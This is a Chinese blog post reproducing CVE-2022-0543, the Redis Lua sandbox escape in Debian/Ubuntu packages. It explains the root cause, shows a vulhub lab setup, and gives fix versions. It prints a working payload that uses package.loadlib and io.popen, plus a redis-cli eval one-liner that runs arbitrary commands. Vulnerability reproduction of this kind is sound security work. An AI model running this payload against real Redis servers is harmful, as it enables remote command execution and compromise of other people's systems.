Redis Lua 沙盒逃逸漏洞(CVE-2022-0543)

已于 2022-03-18 10:50:31 修改
阅读量7.6k 收藏 5
点赞数 1
文章标签: lua redis 开发语言
于 2022-03-18 10:49:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/123569012
版权

1.漏洞描述

        Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。Debian以及Ubuntu发行版的源在打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

2.漏洞原理

        Redis一直有一个攻击点,就是在用户连接redis后,可以通过eval命令执行lua脚本,但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件。Ubuntu/Debian/CentOS等这些发行版本会在原始软件的基础上打一些补丁包,例如Debian给Redis打的补丁,增加了一个include。

        Debian 以及 Ubuntu 发行版的源在打包 Redis 时,不慎在 Lua 沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数,进而逃逸沙箱执行任意命令。我们借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数,即可获得io库,再使用其执行命令。

debian这个include的这段代码是在make的时候用shell脚本动态生成的:

debian/lua_libs_debian.c:
    echo "// Automatically generated; do not edit." >$@
    echo "luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package);" >>$@
    set -e; for X in $(LUA_LIBS_DEBIAN_NAMES); do \
        echo "if (luaL_dostring(lua, \"$$X = require('$$X');\"))" >>$@; \
        echo "    serverLog(LL_NOTICE, \"Error loading $$X library\");" >>$@; \
    done
    echo 'luaL_dostring(lua, "module = nil; require = nil;");' >>$@

-> luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package);

        在原始的redis源码里全局搜索一下这句话,可以发现这句话原本就是存在于源码里的,但是通过条件宏的方式注释掉了,将其注释掉的原因就是“for sandboxing concerns”。 但是Debian的这个补丁却把这句话重新写进去了,而这句话的意思就是向lua的上下文中注入一个package模块。

https://img-blog.csdnimg.cn/img_convert/aad4a90eb46554938ab03c9d0e0eff4a.png

我们可以利用这个模块,来加载任意Lua库,最终逃逸沙箱,执行任意命令。

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res

3.影响版本

2.2 <= redis < 5.0.13

2.2 <= redis < 6.0.15

2.2 <= redis < 6.2.5

4.环境搭建

安装docker,更新vulhub

git pull

进入vulhub/redis/CVE-2022-0543,启动漏洞环境

docker-compose up -d

5.漏洞复现

Kali安装redis-cli工具 apt-get install redis-server

使用redis-cli工具连接redis数据库

redis-cli -h 192.168.42.145 –p 6379

发送恶意代码,可以看到回显数据为执行命令id的内容

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

6.修复建议

升级更新Redis软件包到以下版本:

Debian

Debian Redis(buster):5:5.0.14-1+deb10u2

Debian Redis(bullseye):5:6.0.16-1+deb11u2

Debian Redis(unstable):5:6.0.16-2

Ubuntu

Ubuntu 21.10 Redis:5:6.0.15-1ubuntu0.1

Ubuntu 20.04 Redis:5:5.0.7-2ubuntu0.1

修复方法:在 Lua 初始化的末尾添加package=nil

chaojixiaojingang
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
脚本:我开发的所有Lua脚本,包括漏洞利用脚本(请仅将其用于教育目的)
02-28
剧本 我开发的所有Lua脚本,包括漏洞利用脚本(请仅将其用于教育目的)
Linux环境加密lua脚本,Wireshark Lua脚本文件任意代码执行漏洞
weixin_39621860的博客
05-11 116
发布日期:2011-07-30更新日期:2011-09-08受影响系统:Wireshark Wireshark 1.6.xWireshark Wireshark 1.4.x不受影响系统:Wireshark Wireshark 1.6.2Wireshark Wireshark 1.4.9描述:------------------------------------------------------...
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 969
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
CVE-2022-0543 Redis Lua盒绕过 命令执行
Foreverlove112的博客
09-22 504
CVE-2022-0543 Redis Lua盒绕过 命令执行
Redis Lua盒绕过命令执行(CVE-2022-0543)
swordheart的博客
06-23 418
漏洞原理介绍Redis 是一个开源(BSD 许可)的内存数据结构存储,用作数据库、缓存和消息代理。Redis 是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本的能力。在 Ubuntu 发行版打包中,不慎在 Lua 箱中重新分发一个箱对象,攻击利用这个对象的加载动态库,可以使用从 liblua 加载模块,然后使用此模块执行任意命令;参考链接:漏洞版本 漏洞环境执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器docker-compose up -d服务启动后,我
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
《深入理解resty-redis-cluster:Openresty Lua中的Redis集群客户端》 在现代Web服务开发中,数据存储和缓存扮演着至关重要的角色。Redis作为一款高性能的键值存储系统,广泛应用于缓存、消息队列等领域。而...
lua-resty-redis-connector:lua-resty-redis的连接实用程序
02-03
`lua-resty-redis-connector` 是一个针对 `lua-resty-redis` 库的扩展模块,主要用于在 OpenResty(一个基于 Nginx 的高性能 Web 平台,集成了 LuaJIT)环境中提供更高效的 Redis 连接管理。这个库帮助开发者在处理...
WIndows Redis可视化工具:resp-2022.1.0.0 GUI
02-17
**Redis可视化工具RESP 2022.1.0.0 GUI详解** Redis,全名Remote Dictionary Server,是一款开源、高性能、支持网络、基于键值对的数据存储系统。在开发和运维过程中,为了方便地管理和操作Redis服务器,可视化工具...
redis-stack-server 7.2.0 安装包合集
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
lua-resty-redis-connector-master
04-11
lua-resty-redis-connector:Lua在OpenResty中的Redis连接器详解》 在现代Web服务开发中,Lua作为一种轻量级脚本语言,因其高效、简洁的特性被广泛应用于服务器端。OpenResty是基于Nginx的高性能Web平台,它集成...
逃逸技术总结
09-11
逃逸技术总结。
lua 遍历删除_Cisco ASA/FTD未授权文件删除漏洞简要分析
weixin_39611174的博客
12-16 281
原创 admin河马 这里是河马 今天漏洞简述思科官方在2020年5月6号发布Cisco Adaptive Security Appliance(ASA)和Firepower Threat Defense(FTD)软件web服务目录遍历漏洞(CVE-2020-3187)通告。该漏洞允许未授权的远程攻击者在目标系统上删除web服务文件系统上的文件。该漏洞目前影响配置启用AnyConnect或WebV...
Redis逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
xiaobai_20190815的博客
03-09 982
Redis逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
CVE-2022-0543(lua盒绕过命令执行)复现
kriesa的博客
07-13 569
CVE-2022-0543复现
android逃逸漏洞,【技术分享】逃逸技术详解(一)
weixin_40004051的博客
06-01 801
预估稿费:170RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿写在前面的话在过去的十多年里,针对恶意软件逃逸技术的分析已经成为了对抗高级持续性威胁的银弹,虽然这种技术变得越来越热门,但是恶意软件的开发者们似乎也找到了一种基于静态分析的方法(例如加密、混淆处理和反逆向保护等技术)来躲避传统反病毒安全工具的检测。因此,针对恶意软件逃逸技术的分析与研究已经成为了我们抵...
深入分析逃逸漏洞
kali_Ma的博客
03-03 875
Root Case 下面我们先来看一下漏洞的产生原理,从补丁开始入手,其中最主要的就是下面这个函数: bool IsAcceptingRequests() { return !is_commit_pending_ && state_ != COMMITTING && state_ != FINISHED; } 补丁在每个DatabaseImpl和TransactionImpl接口中添加了该判断,使得处于COMMITTING和FINISHED状态的trans
简单漏洞CVE-2022-0543 Redis Lua 盒绕过
栉风沐雪的博客
01-29 1006
CVE-2022-0543 Redis Lua 盒绕过漏,在Lua箱中遗留了一个对象package,攻击者可以利用package对象提供的加载动态链接库liblua里的函数逃逸redis在用户连接后可以通过eval命令执行Lua脚本,但是脚本跑在箱中,正常情况下无法执行命令读取文件,所以这个漏洞的本质是箱绕过。一般情况下,redis运行在6379(默认端口),而在此镜像中映射于36770端口,可以使用nmap扫描端口发现相应服务。影响范围:Debian系得linux发行版本+Ubuntu。
P2PInfect 蠕虫利用 Lua 逃逸满分漏洞攻击 Redis 服务器
smellycat000的专栏
07-24 266
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员发现了一个新的端对端 (P2P) 蠕虫 P2PInfect,专门攻击 Redis 实例。Palo Alto Networks Unit 42的研究员 William Gamazo 和 Nathaniel Quist 表示,“P2PInfect 利用在 Linux 和 Windows 操作系统上运行的 Redis 服务器,使其比其它蠕...
redis lua盒绕过
08-14
- *1* [Redis Lua盒绕过命令执行(CVE-2022-0543)](https://blog.csdn.net/weixin_45495060/article/details/123692356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值